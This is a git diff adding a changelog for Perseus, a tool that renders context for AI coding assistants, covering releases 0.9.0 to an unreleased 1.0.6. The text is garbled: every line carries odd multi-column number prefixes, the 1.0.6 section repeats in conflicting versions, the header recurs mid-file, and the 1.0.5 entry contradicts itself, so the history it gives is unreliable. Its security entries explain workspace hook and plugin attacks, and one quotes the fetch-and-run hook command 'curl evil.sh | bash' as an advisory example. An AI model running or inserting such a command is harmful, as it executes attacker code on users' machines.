diff --git a/CHANGELOG.md b/CHANGELOG.md index 7e85997..d79f590 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -1,3 +1,1243 @@ +1|2|1|2|1|2|1|# Changelog +3|3|3|2| +4|4|4|3|All notable changes to Perseus. +5|5|5|4| +6|6|6|5|This project follows the alpha-then-semver convention: +7|7|7|6|during the alpha (pre-`1.0.0`) phase, minor bumps may include breaking changes +8|8|8|7|that are documented in the release notes. +9|9|9|8| +10|10|10|9|Each entry maps a release to the task IDs that shipped in it. The +11|11|11|10|single-file `perseus.py` runtime is the only required artifact; everything +12|12|12|11|else (installer, docs) is generated by `scripts/release.sh`. +13|13|13|12| +14|14|14|13|## [1.0.6] β€” UNRELEASED +15|15|15|14| +16|16|16|15|16|Critical security + correctness hotfix bundle from a staff-engineering code +17|17|17|17|review on 2026-06-03. Multiple fixes; no breaking config changes; auto-migration +18|18|18|18|where applicable. See GitHub milestone +19|19|19|19|[v1.0.6](https://github.com/tcconnally/perseus/milestone/1) for full tracking. +20|20|20|20| +21|21|21|21|### πŸ”’ Security +22|22|22|22| +23|23|23|23|- **#136** β€” `long_hex_secret` default redaction rule rewritten. The pre-1.0.6 +24|24|24|24| rule (`\b[a-fA-F0-9]{40,}\b`) silently destroyed git commit hashes (40 hex), +25|25|25|25| SHA-256 checksums (64 hex), Docker digests, and Atlassian content hashes in +26|26|26|26| `@query`, `@waypoint`, and `@perseus` output. The rule now requires an +27|27|27|27| explicit credential anchor (`secret=`, `token:`, `api_key=`, `Authorization=`, +28|28|28|28| etc.) before redacting hex strings. Real secrets in credential context are +29|29|29|29| still caught; bare hashes survive verbatim. New regression tests in +30|30|30|30| `tests/test_redaction.py`. +31|31|31|31|- Internal: redaction rules now support an optional `_anchor_group` field that +32|32|32|32| identifies which capture group holds the secret payload (everything outside +33|33|33|33| the group is preserved). Used by `long_hex_secret`; available for future +34|34|34|34| context-aware rules. +35|35|35|35| +36|36|36|36|### πŸ”§ Configuration & Trust Profiles +37|37|37|37| +38|38|38|38|- **#129** β€” Trust profile layering made structural. Pre-1.0.6 a workspace +39|39|39|39| config setting both `permissions.profile: balanced` and +40|40|40|40| `render.allow_query_shell: true` silently rendered with shell execution +41|41|41|41| disabled because the profile merge overwrote the user's explicit value. +42|42|42|42| v1.0.6 uses `skip_keys` to guarantee that an explicit user value for any +43|43|43|43| `render.*` boolean security gate always wins over the profile default, +44|44|44|44| regardless of profile or direction. Also covers `allow_agent_shell`, +45|45|45|45| `allow_services_command`, `allow_remote_services_health`, and +46|46|46|46| `allow_outside_workspace`. Audit trail records layering decisions. +47|47|47|47| +48|48|48|48|### πŸ“¦ Migration Notes +49|49|49|49|- No config breaking changes. +50|50|50|50|- Explicit user values in `render.*` now structurally win over profile defaults. +51|51|51|51|- If you had relied on `long_hex_secret` redacting bare hex output, add an +52|52|52|52| explicit user rule under `redaction.patterns`. +53|53|53|53| +54|54|54|54|### πŸ”’ Security +55|55|55|55| +56|56|56|56|- **#169** β€” Workspace-sourced plugin configuration (`plugins.dir`) is +57|57|57|57| now refused by default. Pre-1.0.6 a workspace `.perseus/config.yaml` +58|58|58|58| setting `plugins.dir: /path/to/attacker/code` caused +59|59|59|59| `_discover_plugins()` to `spec.loader.exec_module(mod)` on every +60|60|60|60| `.py` file in that directory at startup β€” full Python execution +61|61|61|61| before any directive trust gate, audit, or user prompt. Same attack +62|62|62|62| vector as #168 but with no shell-quoting limits. Attack: git clone a +63|63|63|63| malicious workspace, get pwned. +64|64|64|64| +65|65|65|65| Fix: `_discover_plugins` consults +66|66|66|66| `cfg["_provenance"]["plugins_workspace_sourced"]` set by +67|67|67|67| `load_config`. Workspace-sourced plugin config is refused unless BOTH: +68|68|68|68| 1. Global `~/.perseus/config.yaml` sets `plugins.allow_workspace_sourced: true` +69|69|69|69| 2. Env var `PERSEUS_ALLOW_DANGEROUS=1` +70|70|70|70| +71|71|71|71| Refusal emits a `plugins_workspace_refused` audit event with the +72|72|72|72| refused directory path. Global-sourced plugin config is unaffected. +73|73|73|73| +74|74|74|74| Regression suite (8 tests): workspace plugin dir refused by default, +75|75|75|75| allowed with full opt-in, refused with only-global, refused with +76|76|76|76| only-env, global plugins always load, audit trail, no false-positive +77|77|77|77| refusal when no plugin config exists, allow-gate helper unit test. +78|78|78|78| +79|79|79|79|- **#168** β€” Workspace-sourced shell hooks and Python `hooks.dir` are +80|80|80|80| now refused by default. Pre-1.0.6 a workspace `.perseus/config.yaml` +81|81|81|81| could declare `hooks.on_render_start: ["curl evil.sh | bash"]` and +82|82|82|82| the command would run on the next `perseus render` β€” no +83|83|83|83| `allow_query_shell`, no `PERSEUS_ALLOW_DANGEROUS`, no audit. Same +84|84|84|84| attack via `hooks.dir: /path/to/attacker/code` (Python top-level +85|85|85|85| code runs at import time). Attack: git clone a malicious workspace, +86|86|86|86| get pwned. +87|87|87|87| +88|88|88|88| Fix: `load_config` annotates `cfg["_provenance"]` with which +89|89|89|89| sections came from the workspace source. `hooks.py` refuses +90|90|90|90| workspace-sourced shell hooks and `hooks.dir` Python hooks unless +91|91|91|91| BOTH conditions are met: +92|92|92|92| 1. Global `~/.perseus/config.yaml` sets `hooks.allow_workspace_sourced: true` +93|93|93|93| 2. Env var `PERSEUS_ALLOW_DANGEROUS=1` is set +94|94|94|94| +95|95|95|95| Refusal emits `hooks_workspace_refused` / `hooks_workspace_shell_refused` +96|96|96|96| audit events plus a stderr warning. Global-sourced hooks are +97|97|97|97| unaffected (the user owns global config; trust is implicit). +98|98|98|98| +99|99|99|99| Regression suite (10 tests): workspace shell hook refused, allowed +100|100|100|100| with full opt-in, refused with only-global opt-in, refused with +101|101|101|101| only-env opt-in, global hooks always run, provenance tracking, audit +102|102|102|102| trail, Python hooks.dir refused. +103|103|103|103| +104|104|104|104|105|Critical security + correctness hotfix bundle. See GitHub milestone +105|105|105|106|[v1.0.6](https://github.com/tcconnally/perseus/milestone/1). +106|106|106|107| +107|107|107|108|### πŸ”’ Security Hardening +108|108|108|109| +109|109|109|110|- **#129** β€” Trust profile / user config layering is now **structurally** +110|110|110|111| guaranteed to honor explicit user overrides, regardless of the textual +111|111|111|112| order in which `_apply_permission_profile` and the user-merge run. +112|112|112|113| +113|113|113|114| **Problem (pre-v1.0.6):** the layering precedence rule "user config wins +114|114|114|115| over profile defaults" was correct *as documented* (see `task-45 AC #3`) +115|115|115|116| but depended entirely on `load_config` calling `_apply_permission_profile` +116|116|116|117| BEFORE the user-merge step. Any future refactor that reordered these two +117|117|117|118| calls β€” or a third caller that invoked the profile-apply directly without +118|118|118|119| knowing the convention β€” would silently revert a user who set +119|119|119|120| `permissions.profile: balanced` AND `render.allow_query_shell: true` to +120|120|120|121| `allow_query_shell=false`. This is exactly the scenario filed in #129 +121|121|121|122| ("balanced profile silently disables `@query` despite explicit override"). +122|122|122|123| +123|123|123|124| **Fix:** +124|124|124|125| 1. `load_config` now pre-scans all sources to collect every +125|125|125|126| `(section, key)` the user has explicitly set, then passes that set +126|126|126|127| to `_apply_permission_profile(..., skip_keys=...)` as the new +127|127|127|128| keyword arg. +128|128|128|129| 2. `_apply_permission_profile` skips any key in `skip_keys`, +129|129|129|130| structurally guaranteeing that user values win. The legacy +130|130|130|131| no-skip-keys signature is preserved for backward compatibility. +131|131|131|132| 3. `load_config` emits a `config_profile_overridden` audit event +132|132|132|133| enumerating which user-set keys won out over the profile. This +133|133|133|134| makes the layering decision observable and debuggable. +134|134|134|135| +135|135|135|136| **Regression test matrix:** 30 parametrized tests covering all 3 +136|136|136|137| profiles Γ— all 5 boolean security gates Γ— both override directions, +137|137|137|138| plus 6 explicit tests for direct unit behavior, workspace>global +138|138|138|139| precedence, audit-event observability, and no-noise audit events +139|139|139|140| when only non-profile-managed keys are set. +140|140|140|141| +141|141|141|142| No config breaking changes. Behavior is strictly safer. +142|142|142|143| +143|143|143|144|### πŸ› Bug Fixes (other v1.0.6 items, tracked in milestone) +144|144|144|145|- #128 β€” MnΔ“mΔ“ narrative MD5β†’SHA-256 migration (PR #161) +145|145|145|146|- #131 β€” `memory compact` wall-clock deadline (PR #162) +146|146|146|147|- #136 β€” `long_hex_secret` redaction landmine (PR #159) +147|147|147|148|- #137 β€” `@query` audit log secret leak (PR #160) +148|148|148|149|- #139 β€” MCP `_call_tool` subprocess leak (PR #163) +149|149|149|150|- #130, #135, #138, #140, #141, #142 +150|150|150|151| +151|151|151|152|--- +152|152|152|153|154|155|Critical security + correctness hotfix bundle. See GitHub milestone +153|153|153|156|[v1.0.6](https://github.com/tcconnally/perseus/milestone/1). +154|154|154|157| +155|155|155|158|### πŸ› Bug Fixes +156|156|156|159| +157|157|157|160|- **#128** β€” MnΔ“mΔ“ narratives written under pre-1.0.3 (which used an MD5 +158|158|158|161| hash for the per-workspace narrative filename) are no longer silently +159|159|159|162| orphaned on upgrade. v1.0.3+ uses SHA-256; previously, `_mneme_path()` +160|160|160|163| unconditionally returned the SHA-256 path and the MD5 file sat untouched +161|161|161|164| on disk while the user saw `> ⚠ No MnΔ“mΔ“ narrative found for this +162|162|162|165| workspace.`. +163|163|163|166| - `_mneme_path()` now performs a one-shot in-place rename: if the +164|164|164|167| SHA-256 path doesn't exist but the legacy MD5 path does, `os.replace` +165|165|165|168| is used to atomically move it. The narrative is preserved verbatim. +166|166|166|169| - If both paths exist (concurrent write race, or operator-staged files), +167|167|167|170| the current SHA-256 file wins and the legacy file is left untouched. +168|168|168|171| - New CLI: **`perseus memory doctor`** β€” read-only scan of the memory +169|169|169|172| store that classifies files as SHA-256, legacy MD5, orphan, or unknown. +170|170|170|173| Add `--migrate` to rename all legacy files in one pass; add `--json` +171|171|171|174| for machine-readable output. Idempotent. +172|172|172|175| - New helpers: `_workspace_hash_legacy_md5()`, `_mneme_doctor_scan()`, +173|173|173|176| `_mneme_doctor_migrate()` β€” all importable from `perseus.py` for +174|174|174|177| operators who need to script around them. +175|175|175|178| +176|176|176|179|### πŸ”’ Security (other v1.0.6 items, tracked in milestone) +177|177|177|180|- #136 β€” `long_hex_secret` redaction rule corrupted git hashes (PR #159) +178|178|178|181|- #137 β€” `@query` audit log leaked secrets (PR #160) +179|179|179|182|- #138, #139, #140, #141, #142 +180|180|180|183| +181|181|181|184|### πŸ› Bug Fixes (other v1.0.6 items) +182|182|182|185|- #129, #130, #131, #135 +183|183|183|186| +184|184|184|187|### πŸ“¦ Migration Notes +185|185|185|188|- **No manual action required for the MD5β†’SHA-256 migration.** It happens +186|186|186|189| automatically on first access. Operators with many workspaces can opt +187|187|187|190| to run `perseus memory doctor --migrate` once after upgrading to +188|188|188|191| surface and fix every workspace in one pass. +189|189|189|192| +190|190|190|193|--- +191|191|191|194|195| +192|192|192|196|## [1.0.5] β€” 2026-05-26 +193|193|193|197| +194|194|194|198|**MnΔ“mΔ“ v1 β€” Persistent Memory Backend (upgraded to MnΔ“mΔ“ v2 in 1.0.6):** +195|195|195|199| +196|196|196|200|> ⚠ The initial `@mneme` directive and memory backend were upgraded in a +197|197|197|201|> subsequent release to the native MnΔ“mΔ“ v2 SQLite FTS5 backend. The `@memory` +198|198|198|202|> directive now routes exclusively through MnΔ“mΔ“ v2. See Β§MnΔ“mΔ“ v2 below. +199|199|199|203| +200|200|200|204|- **task-86** β€” `@mneme` directive: query persistent memories via the MnΔ“mΔ“ memory backend. +201|201|201|205|- **task-87** β€” `_mneme_recall()` memory client. +202|202|202|206|- **task-88** β€” `@memory` backend routing *(Upgraded β€” unified under MnΔ“mΔ“ v2.)* +203|203|203|207|- **task-89** β€” `memory.backend` config key *(Upgraded in MnΔ“mΔ“ v2.)* +204|204|204|208|- **task-90** β€” 20 new tests *(Upgraded with the feature.)* +205|205|205|209| +206|206|206|210|## [1.0.4] β€” 2026-05-25 +207|207|207|211| +208|208|208|212|**Phase 24 β€” Extensibility Architecture (Hephaestus):** +209|209|209|213| +210|210|210|214|- **task-65** β€” Plugin directive system: auto-discovered Python plugins under `~/.perseus/plugins/`. Each module exports a `REGISTER` dict of `DirectiveSpec` entries. Plugin errors are warnings, not fatal. +211|211|211|215|- **task-66** β€” Directive macros: `@macro name ... @endmacro` blocks in context documents or `.perseus/macros.md`. Pre-processing pass expands invocations before the resolver loop. +212|212|212|216|- **task-67** β€” Render pipeline hooks: lifecycle callbacks (`on_render_start`, `on_directive_resolved`, `on_cache_hit/miss`, `on_render_complete`, `on_directive_error`) via shell commands or Python callbacks. +213|213|213|217|- **task-68** β€” Output format adapters: plugin interface for custom formats beyond markdown/HTML. `perseus render --format json` returns structured `{resolved, directives}` output. +214|214|214|218|- **task-69** β€” Foreign resolver protocol: `@perseus ` fetches rendered context from remote Perseus serve instances. HMAC signature verification, TTL caching, graceful degradation. +215|215|215|219|- **task-70** β€” Custom schema validators: plugin validators in `.perseus/schemas/`. Referenced via `schema="plugin:my-validator"`. Works alongside the built-in validator. +216|216|216|220|- **task-71** β€” Pipe syntax: lightweight chaining β€” `@query "ls" | @cache ttl=300`. Left-to-right resolution, output of stage N becomes input of stage N+1. +217|217|217|221|- **task-72** β€” Event webhooks: POST render lifecycle events to external URLs with optional HMAC-SHA256 signing. Config-driven with per-event selection. +218|218|218|222|- **task-73** β€” Tool directive integration: `@tool "path/to/tool"` with config-based allowlist, argument restrictions, timeouts, and output size caps. +219|219|219|223|- **task-74** β€” Directive aliasing: config-driven shorthand β€” `@qβ†’@query`, `@svcβ†’@services`. Single-pass expansion, built-ins always win collisions. +220|220|220|224| +221|221|221|225|**Phase 25 β€” MCP Deep Integration:** +222|222|222|226| +223|223|223|227|- **task-75** β€” Expose every directive as an MCP tool. `perseus mcp serve` runs a JSON-RPC 2.0 MCP server over stdio. Each `DIRECTIVE_REGISTRY` entry becomes a `perseus_` tool with auto-generated descriptions and input schemas. Trust gates enforced per-tool. Backward compatible with existing `perseus_get_context` / `perseus_get_health`. +224|224|224|228| +225|225|225|229|## [1.0.3] β€” 2026-05-24 +226|226|226|230| +227|227|227|231|**Phase 24 β€” Assistant format targets, hook installer, MCP server (~840 lines):** +228|228|228|232| +229|229|229|233|- **task-77** β€” Assistant format targets: `perseus render --format agents-md|claude-md|cursorrules|copilot-instructions` +230|230|230|234| renders `.perseus/context.md` into every major assistant's native context file. Auto-resolves +231|231|231|235| default output paths. Each file gets a "Generated by Perseus" header pointing back to the source. +232|232|232|236|- **task-78** β€” Hook installer: `perseus install --target claude-code` drops SessionStart + UserPromptSubmit +233|233|233|237| hooks into `.claude/settings.json` for automatic context injection at session start and on every +234|234|234|238| prompt. Also supports `--target cursor`, `gemini-cli`, `copilot`. Smart merge preserves existing hooks. +235|235|235|239|- **task-79** β€” MCP server faΓ§ade: `perseus mcp serve` runs as a JSON-RPC 2.0 MCP server over stdio, exposing +236|236|236|240| 13 Perseus directives as native MCP tools (query, services, memory, skills, waypoint, session, +237|237|237|241| agora, inbox, read, env, health, agent, date). `mcp config` prints ready-to-paste client configs. +238|238|238|242| +239|239|239|243|**Distribution:** +240|240|240|244| +241|241|241|245|- **task-80** β€” MCP Registry listing published live (`server.json`) β€” 13 tools, PyPI transport. +242|242|242|246|- **task-81** β€” Anthropic Skills marketplace listing (`SKILL.md`) β€” ready for PR to `anthropics/skills`. +243|243|243|247|- `pyproject.toml` version bumped to 1.0.3. +244|244|244|248| +245|245|245|249|**Show HN preparation:** +246|246|246|250| +247|247|247|251|- **task-82** β€” Swarm demo script β€” 120 agents, 4 batches, 51 frames of parallel multi-agent coordination. +248|248|248|252|- **task-83** β€” Swarm demo GIF re-themed to match perseus.observer palette; added to README Multi-Agent section. +249|249|249|253|- **task-84** β€” Show HN post draft. +250|250|250|254|- **task-85** β€” Cyberpunk v2 landing page deployed to perseus.observer. +251|251|251|255| +252|252|252|256|**CI, docs, and tooling:** +253|253|253|257| +254|254|254|258|- GitHub Actions CI workflow with coverage on Python 3.10/3.11/3.12. +255|255|255|259|- `.coveragerc` β€” 70% coverage threshold. +256|256|256|260|- 596 tests passing, 1 skipped. +257|257|257|261| +258|258|258|262|## [1.0.2] β€” 2026-05-23 +259|259|259|263| +260|260|260|264|**Bug fixes (Opus 4.7 Max / Codex 5.5 Extreme High benchmarks):** +261|261|261|265| +262|262|262|266|- **task-63** β€” Fixed `Path.write_text` missing encoding on Windows β€” emoji (πŸ“Œ) crash in default prompts. +263|263|263|267|- **task-64** β€” Fixed `/bin/bash` unreachable on native Windows Python β€” added `_get_shell()` helper +264|264|264|268| using `shutil.which()` with system-default fallback for `@query`, `@services`, and `@agent`. +265|265|265|269|- **task-65** β€” Fixed `@query` binary stdout NoneType crash β€” guarded `result.stdout` with `or ""`. +266|266|266|270|- **task-66** β€” Fixed `perseus --help` crash on Windows (MnΔ“mΔ“ macron `Δ“` can't encode to `cp1252`) β€” +267|267|267|271| added `sys.stdout/stderr.reconfigure(encoding="utf-8")` at import time. +268|268|268|272| +269|269|269|273|**New features:** +270|270|270|274| +271|271|271|275|- **task-67** β€” **`render.max_query_bytes`** (default 256 KB) β€” caps runaway `@query` stdout with a +272|272|272|276| visible truncation marker. Prevents 12 MB scanner output from silently inflating +273|273|273|277| context documents (47Γ— output reduction demonstrated). +274|274|274|278|- **task-68** β€” **Configurable `@query` timeout** β€” `render.query_timeout_s` (default 30s) and per-directive +275|275|275|279| `timeout=N` modifier (e.g. `@query "..." timeout=120`). +276|276|276|280|- **task-69** β€” **`render.parallel_services`** (opt-in, default off) β€” concurrent `@services` health checks +277|277|277|281| via `ThreadPoolExecutor`. 100 services go from ~5 min serial to ~3 s parallel. +278|278|278|282|- **task-70** β€” **`render.parallel_queries`** (opt-in, default off) β€” pre-scans top-level `@query` directives +279|279|279|283| and resolves them concurrently. Directives inside `@if` branches remain sequential. +280|280|280|284| +281|281|281|285|**Integrations:** +282|282|282|286| +283|283|283|287|- **task-71** β€” **VS Code / Cursor extension** β€” auto-renders on `.perseus/context.md` save, status bar +284|284|284|288| indicator, auto-detects target assistant file, watch mode. +285|285|285|289|- **task-72** β€” **Claude Code session hook** β€” one `curl` install, runs `perseus render` before every +286|286|286|290| Claude Code session. +287|287|287|291|- **task-73** β€” **GitHub Action** β€” renders context on push/schedule, commits back to repo so every +288|288|288|292| developer gets pre-resolved context without installing Perseus locally. +289|289|289|293| +290|290|290|294|**Multi-agent coordination:** +291|291|291|295| +292|292|292|296|- **task-74** β€” **Shared checkpoint store** β€” agents across machines/sessions share a single checkpoint +293|293|293|297| store (config: `checkpoints.store` path, accessible via NFS/SMB/unison). +294|294|294|298|- **task-75** β€” **Lock file mechanism** β€” `os.O_CREAT | os.O_EXCL` atomic lock in the checkpoint +295|295|295|299| store prevents concurrent writers from clobbering. Retries with backoff for ~11s before failing +296|296|296|300| gracefully. NFS-safe (O_CREAT | O_EXCL is atomic cross-filesystem). +297|297|297|301|- **task-76** β€” **Checkpoint recovery** β€” `perseus recover --from ` reads the latest checkpoint +298|298|298|302| and prints the workspace/task/status triplet so an agent dropped into a terminal knows exactly +299|299|299|303| where to resume. +300|300|300|304| +301|301|301|305|**Benchmarks:** +302|302|302|306| +303|303|303|307|- Extreme scaling sweep on Linux: 10 β†’ 10,000 `@query` directives, 4 modes each +304|304|304|308| (sequential, cached, parallel, cached+parallel). Cache warm time stays flat at +305|305|305|309| ~0.3–0.5s regardless of scale. 10,000 queries at 0.52s warm (25Γ— vs 13.1s cold). +306|306|306|310|- Integrated heavy benchmark suite (`benchmark/heavy/`) with 4 reports, setup harnesses, +307|307|307|311| machine-readable result JSONs from Claude Code Opus 4.7 and Codex 5.5 Extreme High runs. +308|308|308|312|- Efficiency infographic on README showing coldβ†’warm scaling curve and 40Γ— warm speedup. +309|309|309|313| +310|310|310|314|**CI, docs, and tooling:** +311|311|311|315| +312|312|312|316|- Added GitHub Actions CI workflow with coverage on Python 3.10/3.11/3.12. +313|313|313|317|- Added `.coveragerc` β€” 70% coverage threshold. +314|314|314|318|- Updated `.gitignore` for generated context files (CLAUDE.md, AGENTS.md, .cursorrules). +315|315|315|319|- Updated demo GIF with 6-scene coldβ†’warm walkthrough. +316|316|316|320|- 540 tests passing, 1 skipped. 70% coverage on the 10,463-line artifact. +317|317|317|321| +318|318|318|322|## [1.0.1] β€” 2026-05-21 +319|319|319|323| +320|320|320|324|Patch release: corrects the PyPI author field to the GitHub handle (`tcconnally`). +321|321|321|325|No code changes; all 496 tests pass. +322|322|322|326| +323|323|323|327|- **task-62** (follow-up) β€” post-release doc and metadata fixes: corrected PyPI author +324|324|324|328| field, updated test-count references across README/docs/index.md to reflect live count +325|325|325|329| (496 passed, 1 skipped), and aligned PRODUCT_CONTRACT.md status to v1.0.1 stable. +326|326|326|330| +327|327|327|331|## [1.0.0] β€” 2026-05-20 +328|328|328|332| +329|329|329|333|All Phase 1–22 tasks complete. Perseus v1.0.0 β€” the first stable release. +330|330|330|334| +331|331|331|335|- **task-56** β€” Phase 20C: added headless watch mode (`perseus watch`) β€” inotify/polling +332|332|332|336| file watcher with configurable interval, re-render on change, and debounce. Degrades +333|333|333|337| gracefully when watchdog is unavailable. +334|334|334|338|- **task-57** β€” Phase 21A: added golden evaluation corpus under `tests/fixtures/golden/` +335|335|335|339| covering render, synthesis, and Pythia output shapes; deterministic comparison harness +336|336|336|340| in `tests/test_golden.py`. +337|337|337|341|- **task-58** β€” Phase 21B: added performance budget framework (`tests/test_perf_budgets.py`) +338|338|338|342| with per-command cold/warm timing, advisory warnings at 2Γ— budget, and configurable +339|339|339|343| thresholds. Three commands (render, graph, prefetch) emit advisory warnings in the +340|340|340|344| current environment β€” not failures. +341|341|341|345|- **task-59** β€” Phase 21C: added compatibility and migration suite (`tests/test_compat_migration.py`) +342|342|342|346| covering checkpoint round-trip compatibility, config migration (`oracle:` β†’ `pythia:` rename), +343|343|343|347| pack manifest version handling, and install/upgrade smoke paths. +344|344|344|348|- **task-60** β€” Phase 22A: added `docs/index.md` (documentation hub), `docs/quickstart.md` +345|345|345|349| (install-to-render in 10 steps), and `docs/CONTRIBUTING.md` (contributor guide with +346|346|346|350| single-file constraint, directive authoring 4-touch pattern, test conventions, Agora +347|347|347|351| workflow). Updated README with `## Documentation` section. +348|348|348|352|- **task-61** β€” Phase 22B: added `examples/` with three runnable demo workspaces: +349|349|349|353| `local-cli/` (render, checkpoint, recover, suggest, doctor), `assistant-profile/` +350|350|350|354| (context pack, hermes profile, @memory + @agora), and `container/README.md` (Docker +351|351|351|355| mount and auth guide). Smoke scripts verified end-to-end. +352|352|352|356|- **task-62** β€” Phase 22C: v1 release candidate checklist. 493 tests passing (1 skipped +353|353|353|357| TCP smoke). Release artifacts built and checksums verified. README/CHANGELOG/ROADMAP +354|354|354|358| docs aligned. Version bumped to `1.0.0-rc.1`. Known limitations documented. +355|355|355|359| +356|356|356|360|## [1.0.0-rc.1] β€” 2026-05-20 +357|357|357|361| +358|358|358|362|Release candidate β€” superseded by v1.0.0. +359|359|359|363| +360|360|360|364|- **task-63** β€” Completed the Oracle β†’ Pythia internal rename while preserving the +361|361|361|365| public `perseus oracle` CLI compatibility surface. Added legacy `oracle:` +362|362|362|366| config warnings and one-time `oracle_log.jsonl` β†’ `pythia_log.jsonl` +363|363|363|367| migration. +364|364|364|368|- **task-49** β€” Phase 18B: added `tests/test_release.py` (16 tests) covering all +365|365|365|369| release artifact acceptance criteria β€” version coherence, repeatability, +366|366|366|370| SHA256SUMS integrity, CHANGELOG task mapping, and tarball contents. +367|367|367|371|- **task-50** β€” Phase 18C: aligned scheduler behavior and docs around +368|368|368|372| host-neutral POSIX crontab generation, macOS launchd, Linux systemd, and +369|369|369|373| explicitly deferred native Windows Task Scheduler support. Added scheduler +370|370|370|374| smoke tests and repaired release artifact portability on macOS/BSD tar. +371|371|371|375|- **task-51** β€” Phase 19A: added offline adapter conformance fixtures and a +372|372|372|376| parametrized harness covering generic, Hermes, Codex, Claude Code, Cursor, +373|373|373|377| and Rovo Dev render outputs, pack manifests, and integration docs. +374|374|374|378|- **task-52** β€” Phase 19B: promoted product profiles into a documented gallery +375|375|375|379| with output paths, trust defaults, refresh guidance, non-interactive generation +376|376|376|380| tests, and hardcoded-path guards for all six supported profiles. +377|377|377|381|- **task-53** β€” Phase 19C: polished the VSCode extension for release with +378|378|378|382| reproducible packaging docs, package scripts, LSP render/checkpoint/mutation +379|379|379|383| smoke tests, and static package-manifest checks. +380|380|380|384|- **task-54** β€” Phase 20A: added optional bearer-token authentication for +381|381|381|385| `perseus serve`, a token generator, non-loopback bind safety gates, trust +382|382|382|386| report serve fields, and HTTP auth tests. +383|383|383|387|- **task-55** β€” Phase 20B: added a single-file-runtime container image, +384|384|384|388| compose examples for render and authenticated serve, container trust docs, +385|385|385|389| and static/optional Docker smoke tests. +386|386|386|390|- **task-56** β€” Phase 20C: added `perseus watch`, a dependency-free polling +387|387|387|391| loop for refreshing single source files or context-pack render targets, with +388|388|388|392| deterministic debounce tests and clean shutdown behavior. +389|389|389|393| +390|390|390|394|## [0.9.0] β€” 2026-05-19 +391|391|391|395| +392|392|392|396|### Trust, privacy, and local policy (Phase 17) +393|393|393|397| +394|394|394|398|- **task-45** β€” Permission profiles (`strict` / `balanced` / `power-user`); `perseus trust` and `--json`; `serve.bind` promoted to config; version bump to 0.9.0. +395|395|395|399|- **task-46** β€” Secrets redaction (`DEFAULT_REDACTION_RULES`, `redact_text()`) at render/synthesize/serve trust boundaries; source files never mutated; counts-only report. +396|396|396|400|- **task-47** β€” Audit log (`audit_event()` JSONL with rotation); emitters at 5 trust boundaries; `perseus trust audit [--tail N] [--json]`; default `perseus trust` shows audit posture; secret values never persisted. +397|397|397|401| +398|398|398|402|### Distribution (Phase 18) +399|399|399|403| +400|400|400|404|- **task-48** β€” Installer bootstrap (`scripts/install.sh` + `INSTALL.md`); preserves the single-file runtime; verifies Python 3.10+ and `pyyaml`; idempotent upgrade and clean uninstall. +401|401|401|405|- **task-49** β€” Release artifacts and versioning: `VERSION` file as source of truth, `scripts/release.sh` produces a deterministic tarball + zip + SHA256SUMS, this changelog, and version-coherence checks (perseus.py / VERSION / CHANGELOG). +402|402|402|406| +403|403|403|407|### Verification +404|404|404|408| +405|405|405|409|- Tests: 393 passing, 0 skipped. +406|406|406|410|- Single-file runtime: `perseus.py` (`pyyaml` only). +407|407|407|411| +408|408|408|412|## [0.8.x and earlier] +409|409|409|413| +410|410|410|414|Pre-Phase 17 history is tracked in `tasks/` (closed task files) and `HANDOFF.md`. +411|411|411|415| +412|412|412|413|# Changelog +413|413|414| +414|414|415|All notable changes to Perseus. +415|415|416| +416|416|417|This project follows the alpha-then-semver convention: +417|417|418|during the alpha (pre-`1.0.0`) phase, minor bumps may include breaking changes +418|418|419|that are documented in the release notes. +419|419|420| +420|420|421|Each entry maps a release to the task IDs that shipped in it. The +421|421|422|single-file `perseus.py` runtime is the only required artifact; everything +422|422|423|else (installer, docs) is generated by `scripts/release.sh`. +423|423|424| +424|424|425|## [1.0.6] β€” UNRELEASED +425|425|426| +426|426|427|Critical security + correctness hotfix bundle. See GitHub milestone +427|427|428|[v1.0.6](https://github.com/tcconnally/perseus/milestone/1). +428|428|429| +429|429|430|### πŸ› Bug Fixes +430|430|431| +431|431|432|- **#131** β€” `perseus memory compact` no longer hangs indefinitely when an +432|432|433| LLM provider (e.g. Ollama with a large model) is slow. Pre-1.0.6, +433|433|434| `_mneme_compact_llm()` called `run_llm()` which only enforced +434|434|435| `llm.timeout_s` (default 30s) on the HTTP request itself. With streaming +435|435|436| token providers, individual tokens can arrive within timeout but total +436|436|437| wall time was unbounded β€” operators reported `memory compact` hanging +437|437|438| for hours. +438|438|439| - `_memory_do_compact()` now wraps the LLM call in a wall-clock deadline +439|439|440| via `ThreadPoolExecutor.future.result(timeout=…)`. +440|440|441| - New config knob `memory.compact_total_timeout_s` (default 180s). +441|441|442| Set to 0 for pre-1.0.6 behavior (unbounded; not recommended). +442|442|443| - On timeout, `_memory_do_compact` falls back to the deterministic +443|443|444| narrative builder and writes a clear stderr message: +444|444|445| `> ⚠ MnΔ“mΔ“ compact: LLM provider 'ollama' exceeded +445|445|446| compact_total_timeout_s=180s; falling back to deterministic narrative.` +446|446|447| - New audit event `memory_compact_timeout` records provider, timeout +447|447|448| value, and workspace hash for observability. +448|448|449| - Same fallback path engages on any LLM exception (provider unreachable, +449|449|450| payload error) β€” `memory compact` always produces a usable narrative. +450|450|451| - **Limitation:** ThreadPoolExecutor cannot truly kill the worker +451|451|452| thread; the in-flight HTTP request continues until urllib's +452|452|453| per-request timeout fires. Worst-case wait is therefore +453|453|454| `compact_total_timeout_s + llm.timeout_s`. The leaked thread is +454|454|455| daemonized and will not block process exit. +455|455|456| +456|456|457|### πŸ”’ Security (other v1.0.6 items, tracked in milestone) +457|457|458|- #136 β€” `long_hex_secret` redaction rule corrupted git hashes (PR #159) +458|458|459|- #137 β€” `@query` audit log leaked secrets (PR #160) +459|459|460|- #138, #139, #140, #141, #142 +460|460|461| +461|461|462|### πŸ› Bug Fixes (other v1.0.6 items) +462|462|463|- #128 β€” MnΔ“mΔ“ narrative MD5β†’SHA-256 migration (PR #161) +463|463|464|- #129, #130, #135 +464|464|465| +465|465|466|### πŸ“¦ Migration Notes +466|466|467|- New default `memory.compact_total_timeout_s: 180` is strictly safer +467|467|468| than pre-1.0.6 behavior. Users who want the old (unbounded) behavior +468|468|469| can set it to 0. +469|469|470| +470|470|471|--- +471|471|472| +472|472|473|## [1.0.5] β€” 2026-05-26 +473|473|474| +474|474|475|**Bastra-Recall β€” Persistent Memory Backend (superseded by MnΔ“mΔ“ v2 in 1.0.6):** +475|475|476| +476|476|477|> ⚠ The `@bastra` directive and `memory.backend = "bastra"` config were removed in a +477|477|478|> subsequent release and replaced by the native MnΔ“mΔ“ v2 SQLite FTS5 backend +478|478|479|> 